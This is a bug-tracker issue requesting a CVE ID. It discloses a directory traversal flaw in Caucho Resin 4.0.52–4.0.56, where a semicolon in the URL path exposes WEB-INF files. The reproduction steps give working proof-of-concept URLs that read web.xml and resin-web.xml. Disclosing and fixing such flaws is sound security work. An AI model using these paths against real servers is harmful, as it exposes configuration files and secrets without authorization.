0006448: CVE ID Request

Mantis - Resin
Viewing Issue Advanced Details

ID:	Category:	Severity:	Reproducibility:	Date Submitted:	Last Update:
6448		major	always	11-21-21 02:23	08-29-23 19:52

Reporter:	liulangmao	Platform:
Assigned To:		OS:
Priority:	normal	OS Version:
Status:	new	Product Version:
Product Build:		Resolution:	open
Projection:	none
ETA:	none	Fixed in Version:

Summary:	0006448: CVE ID Request
Description:	Directory traversal vulnerability in Caucho Resin, as distributed in Resin V4.0.52~4.0.56, allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
Steps To Reproduce:	> [Attack Vectors] > http://localhost/resin-doc/;/WEB-INF/resin-web.xml [^] or http://localhost/webapp-name/;/WEB-INF/web.xml [^]
Additional Information:
Relationships
Attached Files:	1b4438dfb8f690cb7eadcd0d0d085816.png [^] (190,723 bytes) 11-21-21 02:23

There are no notes attached to this issue.